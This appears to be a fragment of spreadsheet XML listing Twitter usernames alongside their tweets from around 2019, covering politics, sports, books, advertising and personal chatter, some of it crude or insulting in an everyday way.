    <t>@JupiterAsh When I was 7 I wanted to be a marine biologist that specifically studied blue whales and then my fifth grade teacher said I should be an author so I switched to that.</t>
  </si>
  <si>
    <t>haleighgonz</t>
  </si>
  <si>
    <t>@Randyg1122 I’m sure the Timbervine HOA will fully support this.</t>
  </si>
  <si>
    <t>bcorfee</t>
  </si>
  <si>
    <t>Wondering what an inverted yield curve is, and why it troubles Wall Street? CNBC explains it @ https://t.co/rVP5fECTOU</t>
  </si>
  <si>
    <t>DExpress_Sport</t>
  </si>
  <si>
    <t>Alexa Bliss tells us she still wants to face Trish Stratus #SummerSlam https://t.co/1yhCymp1EH https://t.co/O7zSnW69Nt</t>
  </si>
  <si>
    <t>SwingbladeB</t>
  </si>
  <si>
    <t>@ananavarro Man he is one step away from, "Ok but the shooter DOES have a point."</t>
  </si>
  <si>
    <t>vocalsjk</t>
  </si>
  <si>
    <t>@moonchildjoon_ I don't stan ateez but I see his pics all the time and I think I'm in love https://t.co/dKLw37951b</t>
  </si>
  <si>
    <t>TheWonderCow</t>
  </si>
  <si>
    <t>@alex_abads @voxdotcom The phrasing on Vox implies Disney only gets 5% of the first day's ticket sales, but what first-dollar gross actually means is that Disney gets 5% of every dollar the film earns, even before the film has made back its budget (starting with the very first dollar, hence the name).</t>
  </si>
  <si>
    <t>KevinPMoore0829</t>
  </si>
  <si>
    <t>@realDonaldTrump You look pretty upset that he forgot the coloring book for you.</t>
  </si>
  <si>
    <t>jeonghnz</t>
  </si>
  <si>
    <t>@jenxdeukies You're the best 💗</t>
  </si>
  <si>
    <t>KitchingJess</t>
  </si>
  <si>
    <t>What does having #PCOS and coming off the #pill do to your skin? Take a read and find out! 💕 https://t.co/5cZ0UJt6il #polycysticovaries #womenshealth #contraceptivepill #health #skincare #hormones #hormonal #Skin #skincareroutine #ovariancysts</t>
  </si>
  <si>
    <t>BreannaPalma</t>
  </si>
  <si>
    <t>Yesterday my mom admitted she was wrong, and i said “wow we’re growing out here” and she said “ yeah when are you gonna start” 😂😞</t>
  </si>
  <si>
    <t>voucherhive</t>
  </si>
  <si>
    <t>Cigabuy-70% Off for Authentic Joyetech EKEE 80W 2000mAh ProCore Motor Kit https://t.co/xHuGf1GAP6</t>
  </si>
  <si>
    <t>SWA_Ltd</t>
  </si>
  <si>
    <t>Fintech company Origo has published data revealing how long #pension providers took to process a pension switching request. Out of the 28 firms which provided data, 13 took fewer than 10 days to process a request with the longest being 30.5 days. https://t.co/J1CwqKTCOY</t>
  </si>
  <si>
    <t>Nightinghawk</t>
  </si>
  <si>
    <t>I don't know if many of y'all have seen this but @twitchyspoonie has been fending off racists in her mentions for a few days now and has had to go on private twice because of it. Most recently, someone tried to hack into her account. Pls send her some love and keep an eye out.</t>
  </si>
  <si>
    <t>NotTheBasicType</t>
  </si>
  <si>
    <t>The best thing about the worst time of your life is that you get to see the true colors of everyone. ✨</t>
  </si>
  <si>
    <t>SavingThurman</t>
  </si>
  <si>
    <t>@mhop_19 @DallinHixson @ShannaIshee @KVN_03 Breaking team rules and having an individual go out of his way to shame him and record him with the cops in order to get their 15 minutes of fame are totally different. He was treated well by the coaches but in a way of being treated poorly by fans/students is more than correct.</t>
  </si>
  <si>
    <t>dvlnd3</t>
  </si>
  <si>
    <t>@2021_free so now when it appears that the ship might be sinking they screw up the courage to stand up to the white nationalist messiah</t>
  </si>
  <si>
    <t>DottyLD</t>
  </si>
  <si>
    <t>@DapoCeo @DemGoTyre Bro people see assists and dipping crosses and get excited. As a DEFENDER AWB is miles better than Trent. Simple as that it’s not even a debate</t>
  </si>
  <si>
    <t>wavy_zae</t>
  </si>
  <si>
    <t>@golden_militia lames be reporting the click 🤔</t>
  </si>
  <si>
    <t>KatieMettner</t>
  </si>
  <si>
    <t>"For your information, my penis is the perfect male specimen. Straight, smooth, &amp; has its own beard.” The Secrets Between Us available on #Amazon https://t.co/HsBkOTp8sQ #Newrelease #Amreading #amreadingromance #ContemporaryRomance https://t.co/pZB29gr97K</t>
  </si>
  <si>
    <t>KishaGreen</t>
  </si>
  <si>
    <t>If you are a fan of romance and erotica then check out my book - 'Crazy , Sexy &amp; Deadly' - on #BookBuzzr - https://t.co/T4HvcNZJQZ</t>
  </si>
  <si>
    <t>teresaktraverse</t>
  </si>
  <si>
    <t>So far, I'm really loving "The Man." #taylorSwift #Lover</t>
  </si>
  <si>
    <t>CloudyAlyss</t>
  </si>
  <si>
    <t>Prioritizing wellness and organization gives you the mojo to d... More for Pisces https://t.co/T8GWPSDycc</t>
  </si>
  <si>
    <t>hsaunders6</t>
  </si>
  <si>
    <t>Expected future profits are determined by factors *external* to the securities market – expectations of future price of the product sold, future volumes marketed, and costs to supply the product. Divestment affects none of these. 10/15</t>
  </si>
  <si>
    <t>GoWithTheGroup</t>
  </si>
  <si>
    <t>How To Use the Navigation System in the 2020 Toyota Supra https://t.co/azr0ci9QYV</t>
  </si>
  <si>
    <t>londonelem</t>
  </si>
  <si>
    <t>Third day of 3rd grade. The LES 3rd grade team rolling it some culture building norms for the year. #LondonPossible #WeBeforeMe https://t.co/LXfk9gMY9S</t>
  </si>
  <si>
    <t>PrestonCabeza</t>
  </si>
  <si>
    <t>@ComradeChubs I think the economic system is part of the problem, but the unashamed marketing to children is also a problem. They could make family entertainment without the blatant multi-level branding</t>
  </si>
  <si>
    <t>JoJoshinMe</t>
  </si>
  <si>
    <t>@99freemind @peoplespca @MaximeBernier @munkdebates Signed. Thanks for the heads up.</t>
  </si>
  <si>
    <t>pecking__order</t>
  </si>
  <si>
    <t>tbh when I eat a lot and my belly sticks out a little I look kinda daddy</t>
  </si>
  <si>
    <t>Rj_Vann</t>
  </si>
  <si>
    <t>@nikoristic This same thing happened to me when I managed anytime fitness. Nobody knew who it was until we checked the cameras but there was a trail of shit to the bathroom and inside of it the shit was everywhere 😂 the floor, the walls, the sink 🤢</t>
  </si>
  <si>
    <t>unclehxlmes</t>
  </si>
  <si>
    <t>@shadecam hard fit except the shoes</t>
  </si>
  <si>
    <t>HADERNATI0N</t>
  </si>
  <si>
    <t>@kazminka @sortabiography maiwjehdnwkwjw I’m semi-concerned that Sarah will start calling out demons and demanding they show themselves lmaoooo https://t.co/L0Gn4mFJ9D</t>
  </si>
  <si>
    <t>tmj_ia_retail</t>
  </si>
  <si>
    <t>Now hiring for 257 #Retail job opportunities in #Iowa. Click the link in our bio to see them.</t>
  </si>
  <si>
    <t>blainehenrymma</t>
  </si>
  <si>
    <t>Colby Covington and Kamaru Usman when they fight. https://t.co/U020R7ngX7</t>
  </si>
  <si>
    <t>meIanchoIybIues</t>
  </si>
  <si>
    <t>keith sounds like kith and i would, indeed, kith him</t>
  </si>
  <si>
    <t>LucyKapasiITV</t>
  </si>
  <si>
    <t>Good luck @englandcricket Lovely to heat lots of Aussie accents on my way to the station this morning #Ashes 🏏</t>
  </si>
  <si>
    <t>57KazqZ6UYIq2P2</t>
  </si>
  <si>
    <t>Filary's #BarberShop 💇‍♂️ Only $15.00 for #MensCuts. 29696 Dequindre Rd, #Warren, #Michigan 48092 (248)688-7705 #MichiganBusiness #SupportLocal https://t.co/lKeL0xgDqF</t>
  </si>
  <si>
    <t>rachkincaid</t>
  </si>
  <si>
    <t>The first-timer traveler questions coming from my backseat during errands all week made me even more excited and grateful for this family vacation. Oh, the wonder of a child!</t>
  </si>
  <si>
    <t>James_S99</t>
  </si>
  <si>
    <t>@BBCPolitics America needs to impeach that moron</t>
  </si>
  <si>
    <t>BioChemKristin</t>
  </si>
  <si>
    <t>Failed inspection" report for the Kuehne Chemical Co., Inc. | United States Department Of Homeland Security | September 11 Attacks https://t.co/BgB5Zsgu7K</t>
  </si>
  <si>
    <t>iphonelife</t>
  </si>
  <si>
    <t>Get Ready! Apple to Announce New iPhones on September 10 https://t.co/GBWVdf4f0w https://t.co/lrH0MJVKTN</t>
  </si>
  <si>
    <t>Dev3n87</t>
  </si>
  <si>
    <t>@HaymanWood Looks like progress to me!</t>
  </si>
  <si>
    <t>pjolde</t>
  </si>
  <si>
    <t>@iShowTunes @MrCraigBierko True! It was amazing! Would love to see @MrCraigBierko back on stage! Such an infectious talent!</t>
  </si>
  <si>
    <t>lovefmlondon</t>
  </si>
  <si>
    <t>Now playing The Inchworm by John Coltrane!</t>
  </si>
  <si>
    <t>AlphaStryke</t>
  </si>
  <si>
    <t>Everyone doing ok today? Did you remember to drink some water? #Deceptimom💜</t>
  </si>
  <si>
    <t>ginabeena28</t>
  </si>
  <si>
    <t>"You do not need to be all things to all people." -- @ruthsoukup #reclaimyoursanity #truthbyruth</t>
  </si>
  <si>
    <t>DLoLo89</t>
  </si>
  <si>
    <t>@ETPodcast B an I was VERY IMPRESSED with @MiaYim you had a hellofa match!! You got this next time babe!! Also loved @VelveteenWWE @PeteDunneYxB @roderickstrong match!! An as for @JohnnyGargano &amp; @AdamColePro that was FUCKIN GARGANTUAN!!! #NXTTakeOverToronto An I can say Ive seen ALL LIVE!</t>
  </si>
  <si>
    <t>sfbayview</t>
  </si>
  <si>
    <t>The cheapest way to save the planet grows like a weed! – @ellenhbrown @Truthdig https://t.co/aK1F1u4dOI</t>
  </si>
  <si>
    <t>Cliffy_1973</t>
  </si>
  <si>
    <t>@querlvox @notcapnamerica The one craft project I was good at. I was halfway looking forward to teaching my kids the skill — but schools don’t use textbooks anymore.</t>
  </si>
  <si>
    <t>stockmktgenius</t>
  </si>
  <si>
    <t>$PLAN Anaplan, Inc. Common Stoc Top stock up 186% from low. Close: 58.03 VolvsAvg: 1.33 Liq: $90M https://t.co/hdGkIW9WD2</t>
  </si>
  <si>
    <t>TheWhiner</t>
  </si>
  <si>
    <t>Labor Dept. Moves to Expand Religion Exemption for Hiring and Firing https://t.co/jufrTuWVol https://t.co/MH6rOWcIiJ</t>
  </si>
  <si>
    <t>carleshiaevans</t>
  </si>
  <si>
    <t>I will literally cut someone off for the littlest thing. I do not play games and I do not waste time. I have honestly just been that “time to let you go, cut you off” mood lately and it shows a whole lot. 😂💯🗣</t>
  </si>
  <si>
    <t>Day1raptorking</t>
  </si>
  <si>
    <t>@girlfrmtheisles You would think but there's no way he'd accept the help unless you're offering him his next fix</t>
  </si>
  <si>
    <t>_NAQbyBri</t>
  </si>
  <si>
    <t>Come see me Wednesday night at the #nolajazzmartket!!!!!! https://t.co/wGlBLp87Qb</t>
  </si>
  <si>
    <t>jazzjo</t>
  </si>
  <si>
    <t>@CPinNashville @Bowiegrrl1 @Vlcek3Vlcek @jackjonesbabe Same here for the general, but our primary vote for Harris will carry all the weight for her nomination.</t>
  </si>
  <si>
    <t>MachoManTV</t>
  </si>
  <si>
    <t>@EnticingIy You can catch me at the Bleach table with the real homies.</t>
  </si>
  <si>
    <t>adamcarralejo</t>
  </si>
  <si>
    <t>@cjane87 Try this line of argument with Jews and the Holocaust ...</t>
  </si>
  <si>
    <t>Yolie_Rios</t>
  </si>
  <si>
    <t>@LyndaObst @babsjohnson @joanwalsh @BetoORourke Yet they’re concern of, Freedom of the Press. Go figure!</t>
  </si>
  <si>
    <t>hpstrawberries</t>
  </si>
  <si>
    <t>@EPBryn It's not!! They won't eat tall grass! So he has to mow it anyway. Also he says they're like cats, in that if the grass isn't to their liking they will stand in a lovely patch of it and yowl about how hungry they are. "Sheep," he said "are assholes".</t>
  </si>
  <si>
    <t>Elisabeth_Drcy</t>
  </si>
  <si>
    <t>A Russian firm linked to the Kremlin invested millions in Kentucky. Was it after more than money? - TIME #MoscowMitch #MassacreMitch https://t.co/NwMjpjsryI</t>
  </si>
  <si>
    <t>Candi_Latrice</t>
  </si>
  <si>
    <t>See this is why I’m glad I watch power at 10:00 on Saturday night. Spoil it for me Ima hack ya social media and erase it!😂😂</t>
  </si>
  <si>
    <t>NorthwichLocal</t>
  </si>
  <si>
    <t>The latest The NorthwichLocal! https://t.co/77myCjDXKw Thanks to @wilmslow_news @AZsRealty @PlaceNorthWest #news #legatowen</t>
  </si>
  <si>
    <t>din_nw</t>
  </si>
  <si>
    <t>@mattyglesias I am not interested in @BetoORourke ... he needs to stay in Texas and try and do good. His speech cadence is that of a preacher and I don’t like it.</t>
  </si>
  <si>
    <t>KerriOberhauser</t>
  </si>
  <si>
    <t>@uknowsway @StewardshipAmer @tribelaw @realDonaldTrump Hello, I really don't think Donald still understands who is paying the tariffs. Because his current stance is just plain dumb.</t>
  </si>
  <si>
    <t>__lzbth</t>
  </si>
  <si>
    <t>I thank God, the universe, my family and my boyfriend for getting me through a difficult time. Now for a fresh start this Fall semester, and better days.</t>
  </si>
  <si>
    <t>robertewolf</t>
  </si>
  <si>
    <t>@dveese if you decide to sell Battle of Hoth and Battle of Endor Target exclusives, or the Toys R Us exclusive Ewoks and Rebel Pilots, let me know your price! Thanks</t>
  </si>
  <si>
    <t>esobrallyrats</t>
  </si>
  <si>
    <t>@katalva3 @AndrewH60887392 We may all feel the same way about ourselves</t>
  </si>
  <si>
    <t>2009tazz</t>
  </si>
  <si>
    <t>@cs00582scs @JudgeMoroz @BetoORourke Your words could cause another tragedy. If it does, are you prepared to be accountable for that? God forbid if something else happens. The words, Be still and know, are appropriate at this time. 🙏🏻</t>
  </si>
  <si>
    <t>GlasgowAlbum</t>
  </si>
  <si>
    <t>@jamesdev15 @JanetMcwee i have an obvious raisin for that</t>
  </si>
  <si>
    <t>LeeHall1977</t>
  </si>
  <si>
    <t>@cupfootballblog I was going to say the same thing to you 😂</t>
  </si>
  <si>
    <t>QoqoBulos</t>
  </si>
  <si>
    <t>@Valjohnson1294 @BernieSanders But your American politics is all ABOUT, "corruption". Your Congress is almost exclusively populated by millionaires (and not a few billionaires). Your system is rotten and corrupt from top to bottom. It cannot be democratically reformed. Give up -- you're screwed!</t>
  </si>
  <si>
    <t>SoThatsJasmine</t>
  </si>
  <si>
    <t>I seen this thing where instead of getting rid of all your social media just get rid of all the negativity on your TLs. So all you negative ass people are getting blocked. Because a lot of you are just ignorant</t>
  </si>
  <si>
    <t>FBTBetting</t>
  </si>
  <si>
    <t>Fast start in the first half of the Chinese games, both being 1-1 going into the 2nd half, could be on to a double boom here🤞🔥</t>
  </si>
  <si>
    <t>MattinKansas66</t>
  </si>
  <si>
    <t>@GibbyThePoo @w_terrence Three years and going. It's my retirement job. I hated sitting at home and didn't care for teaching. It's rewarding to observe the rare offender work at improving himself and succeed.</t>
  </si>
  <si>
    <t>Pazx13</t>
  </si>
  <si>
    <t>@yarbsarb you are going to die in japan</t>
  </si>
  <si>
    <t>iceboxdesigns</t>
  </si>
  <si>
    <t>Zendesk puts Smooch acquisition to work with WhatsApp integration https://t.co/E9tLii7wlM #tech #marketing #technews https://t.co/sySbTVzm55</t>
  </si>
  <si>
    <t>drenkme</t>
  </si>
  <si>
    <t>i just want to move in positive direction</t>
  </si>
  <si>
    <t>_bryannamarquez</t>
  </si>
  <si>
    <t>Went on my late wine run &amp; I guess every college boy around had the same idea, the cat calls were on another level tonight https://t.co/h02of8K6by</t>
  </si>
  <si>
    <t>MikeBlondin</t>
  </si>
  <si>
    <t>@kytmagic @johnnydpl @ChingusMaximus @JakeMesz @derektonin Just checked. It was the same year. Amazing.</t>
  </si>
  <si>
    <t>scottmerkin</t>
  </si>
  <si>
    <t>Aaron Sanchez doesn't have the same acclaim as Zack Greinke but he's a tremendous deadline addition by the @astros</t>
  </si>
  <si>
    <t>luismen1991</t>
  </si>
  <si>
    <t>@glkitty Do you believe the government should interfere in private businesses yes or no? You’re not answering because I’m going to catch you in this little hypocrisy circle here lol. https://t.co/Iv2dMyHjhu</t>
  </si>
  <si>
    <t>curiouserly_</t>
  </si>
  <si>
    <t>A brothel ? I’m not looking to make soup.</t>
  </si>
  <si>
    <t>ceeyax2</t>
  </si>
  <si>
    <t>Can someone send me the gif of the dude spitting into the girls mouth during sex???</t>
  </si>
  <si>
    <t>CindyMarie1956</t>
  </si>
  <si>
    <t>Check out this Additional car for high-end racing set digital never used for $20 on OfferUp https://t.co/pwUfEDDZRX</t>
  </si>
  <si>
    <t>NuckChorris16</t>
  </si>
  <si>
    <t>@hauxton @wolfgar77 @LeeTWimberly @NoScienceDenial @natesims07 @mcfunny @geraldpayne25 @skycomet @J_Mark_Morris @Beeeelzebub888 @DaviesHyland @davestewart4444 @DoubleDoubleJon @TakeThatGravity @malo_j @TheWestonMike @spikeinthemidge @JaTapps @NotLordByron @RanWiz @Canna420Uk @RlalbrechtTroy @TJimjones @Awithonelison @TakeThatEpi @R0samond @Christgodtweet @AprilLigeia @crypt_oguru @carlsmythe @truthshoes @Mwforhr @V5RED @rkdoctr @EvanLHarris2 @GardenerN21 @jools6691 @Shadowzerg @TakeThatStraw @BenefactrChurch @SplinterReality @hugh_bothwell @Van_Vagabond @2Cor10_4_6 @firefighter5511 @Dcoronata @guy_JustaGuy @umfpt @Dwyertd @randy_o1970 Wolfie's still excusing himself for blocking people because he can't handle conversation.</t>
  </si>
  <si>
    <t>Freedom4HDP2017</t>
  </si>
  <si>
    <t>@statedeptspox Why ignore Turkey &amp; their jihadi partners in #Afrin then? Also elected officials in Turkey have for years been removed &amp; incarcerated under false pretense because they are Kurdish &amp; demand basic human rights in Turkey. Speak out against #TurkishFascism #StopRemovingKurdishMayors</t>
  </si>
  <si>
    <t>_MLGesus_</t>
  </si>
  <si>
    <t>@elonmusk @NASA @NASAJuno Speak for yourself Elon</t>
  </si>
  <si>
    <t>Unboxed_Blog</t>
  </si>
  <si>
    <t>This week the Duke joins us to tell us all about how he speed painted the Xeno Workers from @coolmini_or_not's #ZombicideInvader https://t.co/gtgPp46yKU #speedpainting #coolminiornot #zombicide #Kickstarter #tabletopgaming #boardgames</t>
  </si>
  <si>
    <t>susan55698023</t>
  </si>
  <si>
    <t>@LindseyGrahamSC And you are a weak knees lily livered asshole</t>
  </si>
  <si>
    <t>DonnellWelton</t>
  </si>
  <si>
    <t>[Download] Kindle Anatomy Lessons From the Great Masters =&gt; https://t.co/IuK13kbCUA</t>
  </si>
  <si>
    <t>sarahisastella</t>
  </si>
  <si>
    <t>@JakeAnbinder Hard agree. Unless you specifically look up “Dorm Room Storage Hacks” most of the organizing tips are rich white ladies telling you to use a $200 gadget to vacuum seal your seasonal tablecloths &amp; drive them to your storage unit¿ Not helpful. MKs methods are much more relevant</t>
  </si>
  <si>
    <t>wildprxfits</t>
  </si>
  <si>
    <t>@DJMissMilan So whenever your about to do something that you would consider “procrastination”. Instead of not doing it and finding something else to procrastinate with, give yourself 3 to 4 hours to procrastinate. You will either burn it out of your system or stop way ahead of time.</t>
  </si>
  <si>
    <t>okmickeyy</t>
  </si>
  <si>
    <t>@Kaldruen Mix in some depression and existential dread and you’ve got a me cocktail.</t>
  </si>
  <si>
    <t>mvadkins</t>
  </si>
  <si>
    <t>@RealWomenVoters @feliciasonmez @CNNSotu I worked my ass off to get to my “gated neighborhood” and out of streets I was raised on. I didn’t cry. I didn’t whine. I didn’t blame others. I busted my ass and earned what I have. You’re a woman? I never looked at you bio. My apologies. That’s no way to speak to you.</t>
  </si>
  <si>
    <t>Angelsgal02</t>
  </si>
  <si>
    <t>@SenNewell @ColoradoNewsCCM @LittletonCOnews @AG CONT6) The US @AG told cpp to take a buffrin and get over it. As I noted even stage4 cancer pt are denied accurate pain control for fear theyd become addicts. All the while the propaganda and hysteria lied with half truths. Here are two: Doctors over Rx'ed and caused CONT)</t>
  </si>
  <si>
    <t>ECMcLaughlin</t>
  </si>
  <si>
    <t>@AshaRangappa_ @MelissaJPeltier @CoryBooker Actually, @JulianCastro explained it in the first debate quite coherently.</t>
  </si>
  <si>
    <t>scyrusk</t>
  </si>
  <si>
    <t>Let's say you stumbled upon a kid recently. Let's say the kid's real cute and you want to share photos with family with limited tech skill. But, let's also say you care about the privacy and security practices of the photo sharing service you use. What would you use?</t>
  </si>
  <si>
    <t>RealSardonicus</t>
  </si>
  <si>
    <t>@LairdBarron The few loggers I've met were deeply superstitious.</t>
  </si>
  <si>
    <t>LakeEffectXJ</t>
  </si>
  <si>
    <t>@KayleeWendt Friend in Kennedy told me their power is out from when that storm moved through the Jamestown area.</t>
  </si>
  <si>
    <t>rickmcopy</t>
  </si>
  <si>
    <t>@rabiasquared But he perks up when he can start blaming Hillary.</t>
  </si>
  <si>
    <t>evansjia</t>
  </si>
  <si>
    <t>@cornett That’s why leader should be lonely in the organization, bury all the truth under the courageous and optimistic shell.</t>
  </si>
  <si>
    <t>dominicasideboa</t>
  </si>
  <si>
    <t>[Read] EBOOK What the Most Successful People Do Before Breakfast: And Two Other Short Guides to Achieving More at Work and at Home =&gt; https://t.co/nRKSccWb0Z</t>
  </si>
  <si>
    <t>issabanshee</t>
  </si>
  <si>
    <t>@da1don On the phone with my bestie being messy AF</t>
  </si>
  <si>
    <t>f_headquarters</t>
  </si>
  <si>
    <t>@VirtuousTroll @tlcoles @zellieimani So brave to notice this institutional racism and sexism. White men are cancer thank you @tlcoles</t>
  </si>
  <si>
    <t>BotShot_NSG</t>
  </si>
  <si>
    <t>Going for that #BotShot #Arena #Dun #Fortnite #XboxShare https://t.co/NDw11VVIFc</t>
  </si>
  <si>
    <t>scarletrocker1</t>
  </si>
  <si>
    <t>@EddieTrunk The Struts! @TheStruts</t>
  </si>
  <si>
    <t>TTG__CB</t>
  </si>
  <si>
    <t>@ceddyb_ Want to say carter but i wont indict anybody for sure lol</t>
  </si>
  <si>
    <t>AbbieOSU</t>
  </si>
  <si>
    <t>@lowrybetter yeah problem is idk who the weirdos areee but I guess I’ll find out as I go lmaoo</t>
  </si>
  <si>
    <t>mikkhah1</t>
  </si>
  <si>
    <t>@FedUpSpeakinUp @realDonaldTrump WOW! JUST LIKE THE U.S. DID IN THE 20TH CENTURY WITH ALL OF LATIN AMERICA'S RESOURCES, ROBERT JAMES. READ ABOUT "THE UNITED FRUIT COMPANY." I GUESS IT'S CHINA'S TURN NOW.</t>
  </si>
  <si>
    <t>hlw132</t>
  </si>
  <si>
    <t>What a beautiful place with beautiful people ❤️ #cheers #catchingup #oldfriends @ The Piece Hall https://t.co/xyZsFbxEgV</t>
  </si>
  <si>
    <t>nene_PinayPinoy</t>
  </si>
  <si>
    <t>Epal Duts Admin :-( /Too ‘security conscious’? Palace downplays POGO’s proximity to military bases:https://t.co/vPcD33xl31 via @ABSCBNNews</t>
  </si>
  <si>
    <t>Jim03220219</t>
  </si>
  <si>
    <t>@DogAngels118 @GOP @realDonaldTrump That’s fine with us! Sorry we prefer not to associate with people who support abuse of innocent children, villainize immigrants and incite racism and bigotry! Such a sad life!</t>
  </si>
  <si>
    <t>navyjedi87</t>
  </si>
  <si>
    <t>@2chis1dogmom I'll settle for an M2 on the roof, just something to deal with these fools hahaha</t>
  </si>
  <si>
    <t>NCB_LureCo</t>
  </si>
  <si>
    <t>Think you have what it takes to complete the bottle cap challenge with a jig? Retweet/tag a friend to challenge them! — NOTE: If you attempt this, please do not litter! The water bottle and cap were disposed of after this video. https://t.co/VGgtBkhf2Z</t>
  </si>
  <si>
    <t>Carsia_NoDe</t>
  </si>
  <si>
    <t>That Popeyes chicken sandwich is nasty. To all y’all saying it was good...y’all need to have higher standards.</t>
  </si>
  <si>
    <t>Taegoe</t>
  </si>
  <si>
    <t>I only remember nights that was post traumatic .. So I don’t ever be acting bougie like im supposed to have it</t>
  </si>
  <si>
    <t>kimludcom</t>
  </si>
  <si>
    <t>#FashionAccessories #NewArrivals! Visit #kimludcom online #shop to buy the latest Blouson Moncler of our #fashion #collections: https://t.co/mtwAlwhQxl.</t>
  </si>
  <si>
    <t>nothnxplz</t>
  </si>
  <si>
    <t>jackson woke me up an hour ago jumping at the blinds bc of a moth and i tried for like fifteen mins to catch it but i couldn’t and like it’s been an hour and i can’t go back to sleep why am i like this</t>
  </si>
  <si>
    <t>abagalerinker</t>
  </si>
  <si>
    <t>I really have 38.5% of the bed and mason has the rest. #imagoodfriend #16years</t>
  </si>
  <si>
    <t>iNewdle</t>
  </si>
  <si>
    <t>@ProFootballTalk Texans organization would be smart to hold on dearly to Clowney. The AFC South is looking like it might be soft this year, so it's time to stay strong while others are losing key players like Andrew Luck.</t>
  </si>
  <si>
    <t>SnideRogue</t>
  </si>
  <si>
    <t>@Scriblit Oh that swap episode had me in stitches. Brilliant. And Sheila's entrance!!</t>
  </si>
  <si>
    <t>Lou4TheWin</t>
  </si>
  <si>
    <t>Up for no reason</t>
  </si>
  <si>
    <t>ShelleyWilson72</t>
  </si>
  <si>
    <t>The Stationmaster's Daughter by Kathleen McGurl @KathMcGurl @rararesources #blogtour #bookreview https://t.co/Aa352RyjWR via @kraftireader</t>
  </si>
  <si>
    <t>jeanbrookes1</t>
  </si>
  <si>
    <t>@Anchor_Dairy who is the old lady buttering the french bread in the advert</t>
  </si>
  <si>
    <t>kayeyewhy</t>
  </si>
  <si>
    <t>@poobsblewfitit Rest up Black Cat 😢💙</t>
  </si>
  <si>
    <t>RunnaLittle</t>
  </si>
  <si>
    <t>@KiwiPie74 @pedroofwefo @_kaushik7 @official_lesdog @marvelstadiumau Love the whole "I was unaffected so I support the gouging of regular peoples hard earned savings by big organisations" approach people take these days.</t>
  </si>
  <si>
    <t>Sherlokette</t>
  </si>
  <si>
    <t>@mtracey @Barnes_Law He lost it a long time ago. He is a mental midget with no capacity to govern. You’d have to be a fool to vote for him.</t>
  </si>
  <si>
    <t>Seymour_from_GP</t>
  </si>
  <si>
    <t>@zachbraff The Middle. Flew under my radar until I met my wife, who was a regular watcher. It was excellent.</t>
  </si>
  <si>
    <t>juangaha</t>
  </si>
  <si>
    <t>How college students can set themselves up for a high-paying career https://t.co/pL5g8LPWnh</t>
  </si>
  <si>
    <t>BDrake71</t>
  </si>
  <si>
    <t>@bkzproblemchild @Cortez72life @brosNsoles @Jhoova602 I like it. I bought the cap n gown 13s too😁</t>
  </si>
  <si>
    <t>haaniyah_</t>
  </si>
  <si>
    <t>When you mispronunced the Quran as a kid and thought you were going to hell. https://t.co/pujCNtrlVR</t>
  </si>
  <si>
    <t>BrianJrtheGreat</t>
  </si>
  <si>
    <t>Debating if I’m going to upgrade to the iPhone 11 Pro next month. 🤨</t>
  </si>
  <si>
    <t>MaximoWorld</t>
  </si>
  <si>
    <t>Our team is ready for a great #MaximoWorld 2019 a Reliabilityweb event https://t.co/5DWiNBp5XV</t>
  </si>
  <si>
    <t>cezico06</t>
  </si>
  <si>
    <t>Made a new channel for video game &amp; movie music (probably not the best timing with all the Nintendo music drama, but it's whatever) https://t.co/cs8uiIoI8r</t>
  </si>
  <si>
    <t>Mykyisme</t>
  </si>
  <si>
    <t>@BoxingHls @JackCullen1461 Take a stab at Terence Crawford. You're worthy of a shot against the terroriser. Just remember that your career isn't over after he embarrasses you. Just a thought. Good fight tonight. I'm impressed.</t>
  </si>
  <si>
    <t>raidersteve81</t>
  </si>
  <si>
    <t>@robelinda2 There is no one to take the piss out of with today’s commentator’s. There are all pretty boring.</t>
  </si>
  <si>
    <t>_ryan_bruce_</t>
  </si>
  <si>
    <t>@ndot8_ I know the house you’re talking about.</t>
  </si>
  <si>
    <t>AtlantaPatch</t>
  </si>
  <si>
    <t>Georgia Ranked Among Worst States To Have A Baby https://t.co/6HVu6K4uwR</t>
  </si>
  <si>
    <t>readysetrock75</t>
  </si>
  <si>
    <t>@findingfletcher “you ruined New York City for me” sounds like thectitke of my next new favorite song</t>
  </si>
  <si>
    <t>sa_forme</t>
  </si>
  <si>
    <t>@erinbaby1024 What are you hoping for?</t>
  </si>
  <si>
    <t>electrablves</t>
  </si>
  <si>
    <t>“In order to understand the world, one has to turn away from it on occasion.” — Albert Camus</t>
  </si>
  <si>
    <t>shardi2209</t>
  </si>
  <si>
    <t>@HarvelaHarvey @Sarcastit @TheDudeDJ @jeremycorbyn You get that most of that £3million is assests such as his house. It's not saying he has £3 million in the bank. But being a socialist doesn't mean you have to be as poor as a church mouse. It's about fairness. The people with the most paying the most which would include him.</t>
  </si>
  <si>
    <t>theFoxFisher</t>
  </si>
  <si>
    <t>And more https://t.co/9yn1GRd8X1</t>
  </si>
  <si>
    <t>LeekaMccray</t>
  </si>
  <si>
    <t>Ready for another one with the right person 🥰🥰 https://t.co/NdxPKerT6i</t>
  </si>
  <si>
    <t>meganNwalsh</t>
  </si>
  <si>
    <t>After years #Mindhunter is FINALLY back! The only show to break my Mad Men marathoning. Let’s go!</t>
  </si>
  <si>
    <t>CharlieHorowicz</t>
  </si>
  <si>
    <t>@BraceyIsGod He’s talking about needing up to 5 players. There’s 4 days left.</t>
  </si>
  <si>
    <t>rebeccaleeon4A</t>
  </si>
  <si>
    <t>Accept when walking away is necessary. "Sometimes walking away is a step forward." Marc and Angel Chernoff #NimbleQuotes</t>
  </si>
  <si>
    <t>leann_bitch</t>
  </si>
  <si>
    <t>Mia is just rolling everywhere now lmao I can’t leave her little ass alone on the bed anymore</t>
  </si>
  <si>
    <t>AssAndElephants</t>
  </si>
  <si>
    <t>@99for99 @ThrowbackLib @tictoc Muslim worshipers literally wouldn’t let Jews come so the police intervened.... yoire literally part of the Antisemitic propaganda if you think what happened was any different. Stay naive my friend</t>
  </si>
  <si>
    <t>XarticbladeX</t>
  </si>
  <si>
    <t>@Earthlyfaune @oderiviere @APlagueTale @AsoboStudio @community_tales @Mondorenard @swloch @lillhoo Well I know what you’ll be listening to for a month lol</t>
  </si>
  <si>
    <t>J_TomF</t>
  </si>
  <si>
    <t>@papez107 @EricLMitchell @PortlandPolice This woman needs to be arrested. Is that a poppy shes carrying? Out of control.</t>
  </si>
  <si>
    <t>bezweesh</t>
  </si>
  <si>
    <t>Create workability to effectively manage information overload.... More for Cancer https://t.co/m62NmIujsL</t>
  </si>
  <si>
    <t>RedDeadRisen</t>
  </si>
  <si>
    <t>@Pulse2AM @GoodShepherd316 Ah so you have proof of evolution? Nice! Cannot wait to hear it.</t>
